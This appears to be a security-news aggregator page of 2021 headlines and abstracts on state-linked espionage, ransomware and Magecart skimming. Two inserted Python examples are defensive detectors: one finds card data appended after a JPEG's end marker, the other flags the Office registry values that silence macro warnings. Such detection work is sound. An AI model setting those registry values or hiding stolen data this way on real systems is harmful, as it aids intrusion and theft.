An unidentified threat actor has been exploiting a now-patched zero-day flaw in Internet Explorer browser to deliver a fully-featured VBA-based remote access trojan (RAT) capable of accessing files stored in compromised Windows systems, and downloading and executing malicious payloads as part of an "unusual" campaign. The backdoor is distributed via a decoy document named "Manifest.docx" that loads the exploit code for the vulnerability from an embedded template, which, in turn, executes shellcode to deploy the RAT, according to cybersecurity firm Malwarebytes, which spotted the suspicious Word file on July 21, 2021. The malware-laced document claims to be a "Manifesto of the inhabitants of Crimea" calling on the citizens to oppose Russian President Vladimir Putin and "create a unified platform called 'People's Resistance.'" The Internet Explorer flaw, tracked as CVE-2021-26411, is notable for the fact that it was abused by the... The Hacker News
July 28, 2021
Hackers posed as flirtatious UK aerobics instructor while targeting US defense contractor’s employee Full Text
Abstract
Cybersecurity researchers said that hackers with ties to the Iranian government targeted U.S. defense contractors in attempts to install malware, including by posing as a United Kingdom-based aerobics instructor.The Hill
July 28, 2021
Chinese Hackers Implant PlugX Variant on Compromised MS Exchange Servers Full Text
Abstract
A Chinese cyberespionage group known for targeting Southeast Asia leveraged flaws in the Microsoft Exchange Server that came to light earlier this March to deploy a previously undocumented variant of a remote access trojan (RAT) on compromised systems. Attributing the intrusions to a threat actor named PKPLUG (aka Mustang Panda and HoneyMyte), Palo Alto Networks' Unit 42 threat intelligence team said it identified a new version of the modular PlugX malware, called Thor, that was delivered as a post-exploitation tool to one of the breached servers. Dating back to as early as 2008, PlugX is a fully-featured second-stage implant with capabilities such as file upload, download, and modification, keystroke logging, webcam control, and access to a remote command shell. "The variant observed [...] is unique in that it contains a change to its core source code: the replacement of its trademark word 'PLUG' to 'THOR,'" Unit 42 researchers Mike Harbison an... The Hacker News
July 28, 2021
Hackers Posed as Aerobics Instructors for Years to Target Aerospace Employees Full Text
Abstract
An Iranian cyberespionage group masqueraded as an aerobics instructor on Facebook in an attempt to infect the machine of an employee of an aerospace defense contractor with malware as part of a years-long social engineering and targeted malware campaign. Enterprise security firm Proofpoint attributed the covert operation to a state-aligned threat actor it tracks as TA456, and by the wider cybersecurity community under the monikers Tortoiseshell and Imperial Kitten. "Using the social media persona 'Marcella Flores,' TA456 built a relationship across corporate and personal communication platforms with an employee of a small subsidiary of an aerospace defense contractor," Proofpoint said in a report shared with The Hacker News. "In early June 2021, the threat actor attempted to capitalize on this relationship by sending the target malware via an ongoing email communication chain." Earlier this month, Facebook revealed it took steps to dismantle a... The Hacker News
July 28, 2021
Fake Software Cracks: A Shady Work of Threat Actors Full Text
Abstract
These types of software are distributed via shady sites, YouTube, and torrents to trick victims into believing that they are downloading the latest software or a game installer.Cyware Alerts - Hacker News
July 27, 2021
Hackers flooded the Babuk ransomware gang’s forum with gay porn images Full Text
Abstract
The Babuk ransomware operators seem to have been hacked themselves: threat actors flooded their forum with gay orgy porn images. At the end of June, the Babuk Locker ransomware was leaked online allowing threat actors to use it to create their own version...Security Affairs
July 21, 2021
TA2721: A New Threat Group Spreading Bandook Malware Full Text
Abstract
Proofpoint discovered a new threat group, TA2721, targeting global organizations across finance, entertainment, and other industries via malspam emails written in Spanish. A highly-targeted campaign by TA2721 suggests that the group has a clear goal and prepares well before launching attacks. Secur ... Cyware Alerts - Hacker News
July 21, 2021
Chinese state hackers breached over a dozen US pipeline operators Full Text
Abstract
Chinese state-sponsored attackers breached 13 US oil and natural gas (ONG) pipeline companies between December 2011 and 2013 following a spear-phishing campaign targeting their employees.BleepingComputer
July 19, 2021
Chinese hackers blamed for breach of Norwegian parliament email accounts Full Text
Abstract
The Norwegian government on Monday formally attributed a breach of email accounts associated with the Norwegian parliament, or the Storting, earlier this year to Chinese hackers involved in the exploitation of vulnerabilities in Microsoft’s Exchange Server.The Hill
July 19, 2021
India: Hackers use ransomware to target techies, demand cryptocurrency Full Text
Abstract
The hackers targeted their data, especially important files that had been compressed by the techies to transmit from their laptops to their official clients or their offices.The Times Of India
July 16, 2021
Facebook Suspends Accounts Used by Iranian Hackers to Target US Military Personnel Full Text
Abstract
Facebook on Thursday disclosed it dismantled a "sophisticated" online cyber espionage campaign conducted by Iranian hackers targeting about 200 military personnel and companies in the defense and aerospace sectors in the U.S., U.K., and Europe using fake online personas on its platform. The social media giant pinned the attacks to a threat actor known as Tortoiseshell (aka Imperial Kitten) based on the fact that the adversary used similar techniques in past campaigns attributed to the threat group, which was previously known to focus on the information technology industry in Saudi Arabia, suggesting an apparent expansion of malicious activity. "This group used various malicious tactics to identify its targets and infect their devices with malware to enable espionage," said Mike Dvilyanski, Head of Cyber Espionage Investigations, and David Agranovich, Director, Threat Disruption, at Facebook. "This activity had the hallmarks of a well-resourced and... The Hacker News
July 16, 2021
Facebook Discovers Highly Targeted Iran-linked Hacking Campaign Against Defense Sector Full Text
Abstract
The hacking group known as "Tortoiseshell" targeted nearly 200 individuals associated with the military as well as defense and aerospace companies in the U.S., and to a lesser extent in the U.K.CBS News
July 15, 2021
Facebook disrupts Iranian hackers using platform to target US military personnel Full Text
Abstract
Facebook on Thursday announced that it had taken steps to disrupt a group of Iranian-based hackers that had leveraged the platform as part of a wider effort to target U.S. military personnel and the defense industry in other countries.The Hill
July 14, 2021
China-linked hacking group DEV-0322 behind Solarwinds Serv-U zero-day attacks Full Text
Abstract
Microsoft attributes the recent attacks that have targeted SolarWinds file transfer servers to a China-linked APT group that the experts tracked as DEV-0322. Microsoft said that the recent attacks against SolarWinds file transfer servers were carried...Security Affairs
July 13, 2021
Russian hacking group believed to be behind Kaseya cyber attack goes offline Full Text
Abstract
Websites on the dark web used by a criminal hacking group believed to be behind the recent massive ransomware attack on software company Kaseya went offline Tuesday.The Hill
July 13, 2021
Iranian Hackers Posing as Scholars Target Professors and Writers in Middle-East Full Text
Abstract
A sophisticated social engineering attack undertaken by an Iranian-state aligned actor targeted think tanks, journalists, and professors with an aim to solicit sensitive information by masquerading as scholars with the University of London's School of Oriental and African Studies (SOAS). Enterprise security firm Proofpoint attributed the campaign — called "Operation SpoofedScholars" — to the advanced persistent threat tracked as TA453, which is also known by the aliases APT35 (FireEye), Charming Kitten (ClearSky), and Phosphorus (Microsoft). The government cyber warfare group is suspected to carry out intelligence efforts on behalf of the Islamic Revolutionary Guard Corps (IRGC). "Identified targets included experts in Middle Eastern affairs from think tanks, senior professors from well-known academic institutions, and journalists specializing in Middle Eastern coverage," the researchers said in a technical write-up shared with The Hacker News. "T... The Hacker News
July 12, 2021
Threat actors scrape 600 million LinkedIn profiles and are selling the data online – again Full Text
Abstract
Researchers from Cyber News Team have spotted threat actors offering for sale 600 million LinkedIn profiles scraped from the platform, again. Original post: https://cybernews.com/news/threat-actors-scrape-600-million-linkedin-profiles-and-are-selling-the-data-online-again/ For...Security Affairs
July 12, 2021
Magecart hackers hide stolen credit card data into images and bogus CSS files Full Text
Abstract
Magecart hackers continuously improve their exfiltration techniques to evade detection; they are now hiding stolen credit card data in images. Magecart hackers have devised a new technique of obfuscating the malware within comment blocks and hiding...Security Affairs
July 09, 2021
Magecart Hackers Hide Stolen Credit Card Data Into Images for Evasive Exfiltration Full Text
Abstract
Cybercrime actors part of the Magecart group have latched on to a new technique of obfuscating the malware code within comment blocks and encoding stolen credit card data into images and other files hosted on the server, once again demonstrating how the attackers are continuously improving their infection chains to escape detection. "One tactic that some Magecart actors employ is the dumping of swiped credit card details into image files on the server [to] avoid raising suspicion," Sucuri security analyst Ben Martin said in a write-up. "These can later be downloaded using a simple GET request at a later date." MageCart is the umbrella term given to multiple groups of cybercriminals targeting e-commerce websites with the goal of plundering credit card numbers by injecting malicious JavaScript skimmers and selling them on the black market. Sucuri attributed the attack to Magecart Group 7 based on overlaps in the tactics, techniques, and procedures (TT... The Hacker News
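The dump-into-an-image trick described in both the Security Affairs summary above and the Sucuri write-up works because web servers and image viewers ignore whatever follows a JPEG's end-of-image marker, so the file still renders and still gets served by a plain GET. That same property gives the defender a cheap integrity check: walk the JPEG's marker structure to the real EOI and see whether anything trails it. The following scanner is an added example written for this page, not Sucuri's tooling or the skimmer's code; the function names are the author's own, the minimal JPEG is constructed byte by byte, and the appended card record is a fake built around the standard Visa test PAN.

```python
import os

def jpeg_end_offset(data):
    """Walk the marker segments of a JPEG and return the offset just past EOI.

    Entropy-coded data never contains FF followed by anything but 00 (byte
    stuffing) or D0-D7 (restart markers), so the first other FF xx pair after
    SOS is the next real marker. An EXIF thumbnail lives inside a
    length-prefixed APP1 segment and is skipped whole, so its own EOI is never
    mistaken for the file's.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos, n = 2, len(data)
    while pos + 1 < n:
        if data[pos] != 0xFF:
            raise ValueError("corrupt JPEG: expected a marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                      # padding byte before a marker
            pos += 1
            continue
        pos += 2
        if marker == 0xD9:                      # EOI: the image proper ends here
            return pos
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            continue                            # stand-alone markers, no length field
        if pos + 2 > n:
            raise ValueError("truncated JPEG: segment length missing")
        pos += int.from_bytes(data[pos:pos + 2], "big")   # length counts itself
        if marker == 0xDA:                      # SOS: skip entropy-coded data
            while pos + 1 < n:
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("truncated JPEG: no EOI marker")


def trailing_payload(data):
    """Bytes appended after the image; b'' for a clean file."""
    return data[jpeg_end_offset(data):]


def scan_images(root):
    """Yield (path, trailing_bytes) for JPEGs under root that carry data after EOI."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith((".jpg", ".jpeg")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            try:
                extra = trailing_payload(data)
            except ValueError:
                continue        # not parseable as a JPEG at all; worth its own look
            if extra:
                yield path, extra


# Constructed minimal JPEG: SOI, a 16-byte APP0, an 8-byte SOS header, seven
# bytes of "entropy data" containing a stuffed FF 00 and an RST marker, then EOI.
CLEAN_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00" + b"\x00" * 9
    + b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x12\xff\x00\x34\xff\xd0\x56"
    + b"\xff\xd9"
)
# Constructed fake record of the kind a skimmer would append (Visa test PAN, not real data).
FAKE_RECORD = b"4111111111111111|12/26|123|J. Doe\n"
SKIMMED_JPEG = CLEAN_JPEG + FAKE_RECORD

if __name__ == "__main__":
    print("clean trailing bytes:", len(trailing_payload(CLEAN_JPEG)))
    print("skimmed trailing bytes:", trailing_payload(SKIMMED_JPEG))
```

Point `scan_images` at the web root or the upload directory of a store and treat any hit as a dump until proven otherwise; a legitimate image with trailing bytes is rare, and the size of the trailing region growing between runs is the stronger signal that a skimmer is still active.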
July 9, 2021
Hackers use a new technique in malspam attacks to disable Macro security warnings in weaponized docs Full Text
Abstract
Threat actors have devised a new trick to disable macro security warnings that leverages non-malicious docs in malspam attacks. Most of the malspam campaigns leverage weaponized Microsoft Office documents and social engineering techniques to trick recipients...Security Affairs
July 08, 2021
Hackers Use New Trick to Disable Macro Security Warnings in Malicious Office Files Full Text
Abstract
While it's a norm for phishing campaigns that distribute weaponized Microsoft Office documents to prompt victims to enable macros in order to trigger the infection chain directly, new findings indicate attackers are using non-malicious documents to disable security warnings prior to executing macro code to infect victims' computers. In yet another instance of malware authors continuing to evolve their techniques to evade detection, researchers from McAfee Labs stumbled upon a novel tactic that "downloads and executes malicious DLLs (ZLoader) without any malicious code present in the initial spammed attachment macro." ZLoader infections propagated using this mechanism have been primarily reported in the U.S., Canada, Spain, Japan, and Malaysia, the cybersecurity firm noted. The malware — a descendant of the infamous ZeuS banking trojan — is well known for aggressively using macro-enabled Office documents as an initial attack vector to steal credentials and personall... The Hacker News
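For the first document to write VBA into a second one and have that code run without a prompt, two per-application Office settings have to be flipped: `AccessVBOM` (trust access to the VBA project object model, needed to write macros programmatically) and `VBAWarnings` set to 1 (enable all macros, so the new code runs silently). Those values live under the user's `Software\Microsoft\Office\<version>\<app>\Security` key, so a registry export from a suspect host tells you quickly whether a document of this kind has already done its work. The checker below is an added example written for this page, not McAfee's detection or anything from the ZLoader campaign; the `.reg` text is constructed, and the function and constant names are the author's own.

```python
import re

# Regular expressions for a Windows .reg export: a bracketed key line and a
# DWORD value line. Added example written for this page, not McAfee's tooling.
KEY_LINE = re.compile(r"^\[(?P<key>HKEY_[^\]]+)\]\s*$")
DWORD_LINE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{8})\s*$')
OFFICE_SECURITY = re.compile(
    r"\\Office\\(?P<ver>\d+\.\d+)\\(?P<app>Word|Excel|PowerPoint)\\Security$",
    re.IGNORECASE,
)

# VBAWarnings: 1 = enable all macros, 2 = disable with notification (default),
# 3 = disable except digitally signed, 4 = disable all without notification.
# AccessVBOM: 1 = trust access to the VBA project object model.
RISKY = {
    "vbawarnings": (1, "all macros run without a warning"),
    "accessvbom": (1, "macro code may write new VBA into other documents"),
}


def weakened_macro_settings(reg_text):
    """Return (app, version, setting, value, why) for each weakened Office macro setting."""
    findings = []
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = KEY_LINE.match(line)
        if m:
            current = OFFICE_SECURITY.search(m.group("key"))   # None outside Security keys
            continue
        if current is None:
            continue
        m = DWORD_LINE.match(line)
        if not m:
            continue
        name, value = m.group("name"), int(m.group("hex"), 16)
        bad_value, why = RISKY.get(name.lower(), (None, None))
        if value == bad_value:
            findings.append((current.group("app"), current.group("ver"), name, value, why))
    return findings


def load_reg_file(path):
    """reg.exe writes exports as UTF-16 with a BOM; Python's utf-16 codec handles both."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()


# Constructed export: Word at the default setting, Excel with both values flipped,
# plus an unrelated key that must be ignored.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security]
"VBAWarnings"=dword:00000002

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security]
"VBAWarnings"=dword:00000001
"AccessVBOM"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options]
"Unrelated"=dword:00000001
"""

if __name__ == "__main__":
    for app, ver, name, value, why in weakened_macro_settings(SAMPLE_REG):
        print(f"{app} {ver}: {name}={value} ({why})")
```

Collect the input with `reg export HKCU\Software\Microsoft\Office office.reg` on the host and feed `load_reg_file("office.reg")` to `weakened_macro_settings`. Either finding on a machine whose users never changed macro settings themselves is worth treating as a sign that a document like the one McAfee describes has already run, and `VBAWarnings` should go back to 2 or be pinned by policy.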
July 8, 2021
Experts bypassed Microsoft’s emergency patch for the PrintNightmare Full Text
Abstract
The emergency patch for the PrintNightmare vulnerability released by Microsoft is incomplete and still allows RCE. Yesterday, Microsoft released an out-of-band KB5004945 security update to address the PrintNightmare vulnerability; unfortunately,...Security Affairs
July 7, 2021
Why I Love (Breaking Into) Your Security Appliances Full Text
Abstract
David “moose” Wolpoff, CTO at Randori, discusses security appliances and VPNs and how attackers only have to “pick one lock” to invade an enterprise through them.Threatpost
July 7, 2021
Researchers Learn From Nation-State Attackers’ OpSec Mistakes Full Text
Abstract
In their investigation of the Charming Kitten group, IBM X-Force researchers investigated attackers' operational security errors to reveal the inner details of how they function and launch attacks.Dark Reading
July 6, 2021
Hacker’s Mom Puts End to 10-Month Cyber-bullying Campaign Full Text
Abstract
Cyber-bully appears to stop online abuse of 6th grader after being caught in the act by mom.Infosecurity Magazine
July 6, 2021
Hackers Target Formula 1 Mobile Push Notification Service to Send Unexpected Notifications to Users Full Text
Abstract
The world of Formula 1 racing was livened up over the weekend as the sport's official app sent out some unexpected notifications to its mobile app users on the eve of the Austrian Grand Prix.The Register
July 04, 2021
Hackers zero in on Tokyo Olympics Full Text
Abstract
Experts are sounding the alarm about potential cyberattacks on the Tokyo Summer Olympics from those looking to create chaos at the already embattled event.The Hill
July 2, 2021
Cobalt Strike Becomes One of the Go-To Tools for Hackers Full Text
Abstract
Cobalt Strike has become one of the most misused tools in the cybercrime world, as a recent report showed a 161% year-on-year increase in cyberattacks using this tool. This tool is now used by general commodity malware operators rather than espionage threat actors and APTs, which makes it all the more worrisome.Cyware Alerts - Hacker News
July 01, 2021
Researchers uncover effort by Chinese-speaking hackers to target Afghan government Full Text
Abstract
Chinese-speaking hackers recently targeted the top tiers of the Afghan government, along with the governments of other nearby nations, research published Thursday found.The Hill
July 01, 2021
NSA: Russian GRU hackers use Kubernetes to run brute force attacks Full Text
Abstract
The National Security Agency (NSA) warns that Russian nation-state hackers are conducting brute force attacks to access US networks and steal email and files.BleepingComputer
July 1, 2021
Enterprise and cloud environments have been under siege from Russian hackers since 2019 Full Text
Abstract
Hackers at Russia’s GRU have carried out a years-long, stealthy espionage campaign that targets enterprise and cloud environments in the U.S.SCMagazine
June 29, 2021
Hackers use zero-day to mass-wipe My Book Live devices Full Text
Abstract
A zero-day vulnerability in Western Digital My Book Live NAS devices allowed a threat actor to perform mass-factory resets of devices last week, leading to data loss.BleepingComputer
June 28, 2021
Microsoft investigates threat actor distributing malicious Netfilter Driver Full Text
Abstract
Microsoft is investigating a strange attack in which a threat actor used a driver signed by the company, the Netfilter driver, to implant a rootkit. Microsoft announced it is investigating a threat actor distributing malicious drivers in attacks aimed at the gaming...Security Affairs
June 28, 2021
Hackers Trick Microsoft Into Signing Netfilter Driver Loaded With Rootkit Malware Full Text
Abstract
Microsoft on Friday said it's investigating an incident wherein a driver signed by the company turned out to be a malicious Windows rootkit that was observed communicating with command-and-control (C2) servers located in China. The driver, called " Netfilter ," is said to target gaming environments, specifically in the East Asian country, with the Redmond-based firm noting that "the actor's goal is to use the driver to spoof their geo-location to cheat the system and play from anywhere." "The malware enables them to gain an advantage in games and possibly exploit other players by compromising their accounts through common tools like keyloggers," Microsoft Security Response Center (MSRC) said . The rogue code signing was spotted by Karsten Hahn, a malware analyst at German cybersecurity company G Data, who shared additional details of the rootkit, including a dropper , which is used to deploy and install Netfilter on the system. Upon succThe Hacker News
June 27, 2021
Hackers target Cisco ASA devices after a PoC exploit code was published online Full Text
Abstract
Experts warn of attacks against Cisco ASA devices after researchers from Positive Technologies published PoC exploit code on Twitter for a known XSS vulnerability.Security Affairs
June 26, 2021
Nobelium hackers accessed Microsoft customer support tools Full Text
Abstract
Microsoft says they have discovered new attacks conducted by the Russian state-sponsored Nobelium hacking group, including a hacked Microsoft support agent's computer that exposed customer's subscription information.BleepingComputer
June 25, 2021
Hackers exploit 3-years old flaw to wipe Western Digital devices Full Text
Abstract
Threat actors are wiping many Western Digital (WD) My Book Live and My Book Live Duo NAS devices, likely exploiting an old vulnerability. Owners of WD My Book Live and My Book Live Duo network-attached storage (NAS)...Security Affairs
June 25, 2021
Hackers Crack Pirated Games with Cryptojacking Malware Full Text
Abstract
Threat actors have so far made about $2 million from Crackonosh, which secretly mines Monero cryptocurrency from affected devices.Threatpost
June 23, 2021
Pakistan-linked hackers targeted Indian power company with ReverseRat Full Text
Abstract
A threat actor with suspected ties to Pakistan has been striking government and energy organizations in the South and Central Asia regions to deploy a remote access trojan on compromised Windows systems, according to new research. "Most of the organizations that exhibited signs of compromise were in India, and a small number were in Afghanistan," Lumen's Black Lotus Labs said in a Tuesday analysis. "The potentially compromised victims aligned with the government and power utility verticals." Some of the victims include a foreign government organization, a power transmission organization, and a power generation and transmission organization. The covert operation is said to have begun at least in January 2021. The intrusions are notable for a number of reasons, not least because in addition to its highly-targeted nature, the tactics, techniques, and procedures (TTPs) adopted by the adversary rely on repurposed open-source code and the use of compromised domThe Hacker News
June 22, 2021
RedFoxtrot Group Linked to Unit 69010 from China Full Text
Abstract
Cyberespionage campaigns spread across several years were linked to the Chinese military group PLA Unit 69010. Dubbed RedFoxtrot, the threat actor focused on gathering military intelligence from various countries. Learn how PLA-affiliated groups are operating and targeting victims.Cyware Alerts - Hacker News
June 21, 2021
Molerats Hackers Actively Targeting Middle East Governments Full Text
Abstract
Proofpoint discovered that the MoleRATs hacking group, which has become active again after a two-month break, is infiltrating government networks in the Middle East. The group has constantly been targeting entities working with the government or other geopolitical entities in the region.Cyware Alerts - Hacker News
June 19, 2021
RedFoxtrot operations linked to China’s PLA Unit 69010 due to bad opsec Full Text
Abstract
Experts attribute a series of cyber-espionage campaigns dating back to 2014, and focused on gathering military intelligence, to China-linked Unit 69010. Experts from Recorded Future’s Insikt Group linked a series of attacks, part of RedFoxtrot China-linked...Security Affairs
June 18, 2021
Cyber espionage by Chinese hackers in neighbouring nations is on the rise Full Text
Abstract
A string of cyber espionage campaigns dating all the way back to 2014 and focused on gathering military intelligence from neighbouring countries have been linked to a Chinese military-intelligence apparatus. In a wide-ranging report published by Massachusetts-headquartered Recorded Future this week, the cybersecurity firm's Insikt Group said it identified ties between a group it tracks as " RedFoxtrot " to the People's Liberation Army (PLA) Unit 69010 operating out of Ürümqi, the capital of the Xinjiang Uyghur Autonomous Region in the country. Previously called the Lanzhou Military Region's Second Technical Reconnaissance Bureau, Unit 69010 is a military cover for a Technical Reconnaissance Bureau (TRB) within China's Strategic Support Force (SSF) Network Systems Department ( NSD ). The connection to PLA Unit 69010 stems from what the researchers said were "lax operational security measures" adopted by an unnamed suspected RedFoxtrot threat actThe Hacker News
June 17, 2021
Suspected Iranian Hackers Exploit Chrome, Telegram, VPN Apps to Spy Over Dissidents Full Text
Abstract
For the last six years, hackers have stalked Iranian dissidents with spying tools that mimic the software those dissidents use to protect their communications, security firm Kaspersky said Wednesday.Cyberscoop
June 16, 2021
Ferocious Kitten: 6 years of covert surveillance in Iran Full Text
Abstract
Interestingly, some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.Kaspersky Labs
June 15, 2021
Wear your MASQ! New Device Fingerprint Spoofing Tool Available in Dark Web Full Text
Abstract
The MASQ tool could be used by attackers to emulate device fingerprints, allowing them to bypass fraud protection controls. The Resecurity® HUNTER unit has identified a new tool available for sale in the Dark Web called MASQ, enabling bad actors...Security Affairs
June 10, 2021
Hacker Known as Max Is a 55-Year-Old Woman, Prosecutors Say Full Text
Abstract
Alla Witte, now 55, assumed the identity “Max” and started writing illicit code, according to a federal indictment unsealed on February 8 after she was detained in Miami.Bloomberg
June 10, 2021
This is how fast a password leaked on the web will be tested out by hackers Full Text
Abstract
In a new study, Agari researchers found that the accounts are actively accessed within hours of the login credentials being posted online on phishing websites and forums.ZDNet
June 8, 2021
TeamTNT Attempting to Reign on Cloud-based Platforms Full Text
Abstract
TeamTNT is targeting the credentials of 16 cloud-based platforms, including AWS and Google Cloud, which it uses for its illegitimate cryptojacking operations. Organizations are recommended to proactively block the network connections and C2 endpoints associated with TeamTNT.Cyware Alerts - Hacker News
June 8, 2021
Hacking space: How to pwn a satellite Full Text
Abstract
The first bad thing that can make lots of other bad things happen is to block communication to the device, since it makes it unusually difficult to fly up to troubleshoot on the remote end.ESET Security
June 8, 2021
Evil Corp Impersonates PayloadBin Group to Avoid Federal Sanctions Full Text
Abstract
The cybercriminals try to pin new ransomware on Babuk Locker in an effort to fly under the radar of an ongoing FBI investigation.Threatpost
June 7, 2021
TeamTNT attacks IAM credentials of AWS and Google Cloud Full Text
Abstract
Threat actors that targeted AWS cloud environments are now also targeting the credentials of 16 additional applications, including the AWS apps as well as Google Cloud credentials.SCMagazine
June 7, 2021
Hacker Group Gunning for Musk Full Text
Abstract
Anonymous blasts billionaire for “superiority complex” and alleged Bitcoin trollingInfosecurity Magazine
June 5, 2021
TeamTNT Operations Actively Enumerating Cloud Environments Full Text
Abstract
TeamTNT operations have targeted and, after compromise, exfiltrated AWS credentials, targeted Kubernetes clusters, and created new malware called Black-T that integrates open source cloud-native tools to assist in their cryptojacking operations.Palo Alto Networks
June 4, 2021
China-linked attackers breached Metropolitan Transportation Authority (MTA) using Pulse Secure zero-day Full Text
Abstract
China-linked threat actors breached the network of New York City's Metropolitan Transportation Authority (MTA) in April using a Pulse Secure zero-day.Security Affairs
June 3, 2021
Supreme Court narrows interpretation of CFAA, to the relief of ethical hackers Full Text
Abstract
Individuals do not exceed authorized computer access if they obtain data to which they are entitled for improper reasons, 6-3 majority rules.SCMagazine
June 3, 2021
Chinese Cyberspies UNC2630 Targeting US and EU Organizations Full Text
Abstract
Experts laid bare the tactics adopted by Chinese threat actors to consistently exploit Pulse Secure VPN devices and drop malware to exfiltrate sensitive information. Looking at the scenario, security agencies need to buckle up for more challenging events and detect such threats to stay protected.Cyware Alerts - Hacker News
June 03, 2021
New SkinnyBoy malware used by Russian hackers to breach sensitive orgs Full Text
Abstract
Security researchers have discovered a new piece of malware called SkinnyBoy that was used in spear-phishing campaigns attributed to Russian-speaking hacking group APT28.BleepingComputer
June 02, 2021
New York subway system was targeted by Chinese-linked hackers in April Full Text
Abstract
New York’s subway system was targeted by hackers with links to the Chinese government in April, according to an MTA document reported on by The New York Times.The Hill
June 02, 2021
Hacker forum contest gives $100K for new ways to steal digital assets Full Text
Abstract
The administrator of a Russian-speaking cybercriminal forum has held a contest for the community to share uncommon methods to target cryptocurrency-related technology.BleepingComputer
June 2, 2021
This is how attackers bypass AMSI anti-malware scanning protection Full Text
Abstract
AMSI's integration with Office 365 was recently upgraded to include Excel 4.0 (XLM) macro scanning to try and combat the increase of malicious macros as an infection vector.ZDNet
June 02, 2021
Researchers Uncover Hacking Operations Targeting Government Entities in South Korea Full Text
Abstract
A North Korean threat actor active since 2012 has been behind a new espionage campaign targeting high-profile government officials associated with its southern counterpart to install an Android and Windows backdoor for collecting sensitive information. Cybersecurity firm Malwarebytes attributed the activity to a threat actor tracked as Kimsuky, with the targeted entities comprising the Korea Internet and Security Agency (KISA), Ministry of Foreign Affairs, Ambassador of the Embassy of Sri Lanka to the State, International Atomic Energy Agency (IAEA) Nuclear Security Officer, Deputy Consul General at Korean Consulate General in Hong Kong, Seoul National University, and Daishin Securities. The development is only the latest in a series of surveillance efforts aimed at South Korea. Believed to be operating on behalf of the North Korean regime, Kimsuky (aka Velvet Chollima, Black Banshee, and Thallium) has a track record of singling out South Korean entities while expanding theirThe Hacker News
May 31, 2021
Steal Web Session Cookies From Facebook in Chrome Full Text
Abstract
Cookies are simply small pieces of data that the web browser uses for a better web surfing experience. Cookies are stored in memory and on the hard drive of users' computers.GB Hackers
May 29, 2021
Microsoft: Russian hackers used 4 new malware in USAID phishing Full Text
Abstract
Microsoft states that a Russian hacking group used four new malware families in recent phishing attacks impersonating the United States Agency for International Development (USAID).BleepingComputer
May 29, 2021
The Bizarro Streaming Site That Hackers Built From Scratch Full Text
Abstract
The BravoMovies campaign, spotted by researchers at security firm ProofPoint, has been around since at least early May. While many of its elements seem absurd at a glance, it shows just how far hackers are willing to go to ensnare their victims.Wired
May 29, 2021
Researchers Demonstrate 2 New Hacks to Modify Certified PDF Documents Full Text
Abstract
Cybersecurity researchers have disclosed two new attack techniques on certified PDF documents that could potentially enable an attacker to alter a document's visible content by displaying malicious content over the certified content without invalidating its signature. "The attack idea exploits the flexibility of PDF certification, which allows signing or adding annotations to certified documents under different permission levels," said researchers from Ruhr-University Bochum, who have systematically analyzed the security of the PDF specification over the years. The findings were presented at the 42nd IEEE Symposium on Security and Privacy ( IEEE S&P 2021 ) held this week. The two attacks — dubbed Evil Annotation and Sneaky Signature attacks — hinge on manipulating the PDF certification process by exploiting flaws in the specification that governs the implementation of digital signatures (aka approval signature) and its more flexible variant called certificaThe Hacker News
May 28, 2021
Microsoft: Russian SVR hackers target govt agencies from 24 countries Full Text
Abstract
The Microsoft Threat Intelligence Center (MSTIC) has discovered that the Russian-backed hackers behind the SolarWinds supply-chain attack are now coordinating an ongoing phishing campaign targeting government agencies worldwide.BleepingComputer
May 28, 2021
Chinese Cyber Espionage Hackers Continue to Target Pulse Secure VPN Devices Full Text
Abstract
Cybersecurity researchers from FireEye unmasked additional tactics, techniques, and procedures (TTPs) adopted by Chinese threat actors who were recently found abusing Pulse Secure VPN devices to drop malicious web shells and exfiltrate sensitive information from enterprise networks. FireEye's Mandiant threat intelligence team, which is tracking the cyberespionage activity under two threat clusters UNC2630 and UNC2717, said the intrusions line up with key Chinese government priorities, adding "many compromised organizations operate in verticals and industries aligned with Beijing's strategic objectives outlined in China's recent 14th Five Year Plan ." On April 20, the cybersecurity firm disclosed 12 different malware families, including STEADYPULSE and LOCKPICK, that have been designed with the express intent to infect Pulse Secure VPN appliances and put to use by several cyberespionage groups believed to be affiliated with the Chinese government. UNC263The Hacker News
May 27, 2021
Hackers Using Fake Foundations to Target Uyghur Minority in China Full Text
Abstract
The Uyghur community located in China and Pakistan has been the subject of an ongoing espionage campaign aiming to trick the targets into downloading a Windows backdoor to amass sensitive information from their systems. "Considerable effort was put into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up to date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups," according to joint research published by Check Point Research and Kaspersky today. The Uyghurs are a Turkic ethnic minority group originating from Central and East Asia and are recognized as native to the Xinjiang Uyghur Autonomous Region in Northwest China. At least since 2015, government authorities have placed the region under tight surveillance, putting hundreds of thousands into prisons and internment camps that the government calls "Vocational Education and Training Centers.The Hacker News
May 26, 2021
Agrius group targets Israel with data-wipers disguised as ransomware Full Text
Abstract
Researchers from cyber-security firm SentinelOne discovered a new Iran-linked threat actor, tracked as Agrius, which employed data-wipers disguised as ransomware to destroy targeted IT infrastructure.Security Affairs
May 24, 2021
North Korean hackers behind CryptoCore multi-million dollar heists Full Text
Abstract
